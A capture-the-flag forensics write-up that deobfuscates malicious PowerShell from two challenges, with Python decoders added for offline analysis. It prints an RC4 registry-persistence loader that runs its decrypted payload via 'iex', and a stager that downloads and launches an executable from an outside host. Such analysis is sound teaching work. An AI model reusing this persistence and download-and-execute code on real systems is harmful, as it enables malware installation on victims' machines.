# Forensics

## Puppeteer - H3cko

Found malicious PowerShell code:

```powershell
[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;
# The second stage is stored reversed; restore its order and append it to the first stage
[array]::Reverse($stage2);
$stage3 = $stage1 + $stage2;
# A single-byte XOR with 0xd1 recovers the plaintext
for($i=0;$i -lt $stage3.count;$i++){
    $stage3[$i] = $stage3[$i] -bxor 0xd1;
}
$a = ""   # start from an empty string so a stale $a in the session cannot pollute the output
$stage3 | % { $a += [char] $_ }
Write-Host $a
# Output: HTB{b3wh4r3_0f_th3_b00t5_0f_just1c3...}
```

## Golden Persistence - Matixx22

I've used `Registry Explorer` to analyze the file. Found an encoded script in the bookmarked `Run` key. Decoded it in an online tool:

```powershell
function encr {
    param(
        [Byte[]]$data,
        [Byte[]]$key
    )
    # This is plain RC4: key scheduling (KSA) followed by keystream generation (PRGA)
    [Byte[]]$buffer = New-Object Byte[] $data.Length
    $data.CopyTo($buffer, 0)
    [Byte[]]$s = New-Object Byte[] 256;
    [Byte[]]$k = New-Object Byte[] 256;
    for ($i = 0; $i -lt 256; $i++) {
        $s[$i] = [Byte]$i;
        $k[$i] = $key[$i % $key.Length];
    }
    $j = 0;
    for ($i = 0; $i -lt 256; $i++) {
        $j = ($j + $s[$i] + $k[$i]) % 256;
        $temp = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $temp;
    }
    $i = $j = 0;
    for ($x = 0; $x -lt $buffer.Length; $x++) {
        $i = ($i + 1) % 256;
        $j = ($j + $s[$i]) % 256;
        $temp = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $temp;
        [int]$t = ($s[$i] + $s[$j]) % 256;
        $buffer[$x] = $buffer[$x] -bxor $s[$t];
    }
    return $buffer
}

function HexToBin {
    param(
        [Parameter(Position=0, Mandatory=$true, ValueFromPipeline=$true)]
        [string]$s)
    $return = @()
    for ($i = 0; $i -lt $s.Length ; $i += 2) {
        $return += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber)
    }
    Write-Output $return
}

# $enc was referenced before it was defined in the recovered script, so it is moved up here
$enc = [System.Text.Encoding]::ASCII
[Byte[]]$key = $enc.GetBytes("Q0mmpr4B5rvZi3pS")
# The hex ciphertext is spread over five registry values and reassembled in this order
$encrypted1 = (Get-ItemProperty -Path HKCU:\SOFTWARE\ZYb78P4s).t3RBka5tL
$encrypted2 = (Get-ItemProperty -Path HKCU:\SOFTWARE\BjqAtIen).uLltjjW
$encrypted3 = (Get-ItemProperty -Path HKCU:\SOFTWARE\AppDataLow\t03A1Stq).uY4S39Da
$encrypted4 = (Get-ItemProperty -Path HKCU:\SOFTWARE\Google\Nv50zeG).Kb19fyhl
$encrypted5 = (Get-ItemProperty -Path HKCU:\AppEvents\Jx66ZG0O).jH54NW8C
$encrypted = "$($encrypted1)$($encrypted2)$($encrypted3)$($encrypted4)$($encrypted5)"
[Byte[]]$data = HexToBin $encrypted
$DecryptedBytes = encr $data $key
$DecryptedString = $enc.GetString($DecryptedBytes)
# The stager runs the decrypted script; when analysing, replace `iex` with Write-Output to dump it instead
$DecryptedString|iex
```

Collect the hex data from each registry value named in the script, concatenate it in that order and follow the script's steps to decode it. The flag is in `$DecryptedString`:

```powershell
$path ="C:\ProgramData\windows\goldenf.exe";
$exists = Test-Path -Path $path -PathType Leaf;
if ( $exists ){
    Start-Process $path
} else{
    mkdir "C:\ProgramData\windows";
    Invoke-WebRequest -Uri https://thoccarthmercenaries.edu.tho/wp-content/goldenf.exe -OutFile $path;
    $flag="HTB{g0ld3n_F4ng_1s_n0t_st34lthy_3n0ugh}";
    Start-Process $path
}
```

Flag: `HTB{g0ld3n_F4ng_1s_n0t_st34lthy_3n0ugh}`
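Both decode routines re-implemented in Python, as an added example that is not part of the original write-up: it recovers the Puppeteer flag from the byte arrays quoted above and shows the RC4 step of the Golden Persistence stager on a constructed ciphertext (the real registry hex is not reproduced on the page), so the blobs can be analysed without executing the malicious PowerShell.

```python
"""Offline decoders for the two stagers in this write-up (added example)."""

# Puppeteer: the two byte arrays exactly as quoted in the PowerShell above.
STAGE1 = bytes([0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3,
                0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3])
STAGE2 = bytes([0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4,
                0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1])


def decode_puppeteer(stage1: bytes, stage2: bytes, xor_key: int = 0xD1) -> str:
    """Mirror the script: reverse stage2, append it to stage1, XOR every byte."""
    combined = stage1 + stage2[::-1]
    return bytes(b ^ xor_key for b in combined).decode("ascii")


def rc4(data: bytes, key: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA), which is what the registry script's `encr` is."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation + XOR
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def decrypt_registry_chunks(hex_chunks, key: str) -> str:
    """Join the hex values in registry order ($encrypted1..5), then RC4-decrypt."""
    blob = bytes.fromhex("".join(hex_chunks))
    return rc4(blob, key.encode("ascii")).decode("ascii")


# Constructed sample: the page does not reproduce the real registry hex, so a
# stand-in payload is encrypted with the script's key and split into five hex
# chunks, the way the five registry values carry the real one.
RC4_KEY = "Q0mmpr4B5rvZi3pS"
SAMPLE_PLAINTEXT = "Write-Host 'stand-in payload'"
_cipher_hex = rc4(SAMPLE_PLAINTEXT.encode("ascii"), RC4_KEY.encode("ascii")).hex()
SAMPLE_CHUNKS = [_cipher_hex[i:i + 12] for i in range(0, len(_cipher_hex), 12)]

if __name__ == "__main__":
    print(decode_puppeteer(STAGE1, STAGE2))          # the Puppeteer flag
    print(decrypt_registry_chunks(SAMPLE_CHUNKS, RC4_KEY))
```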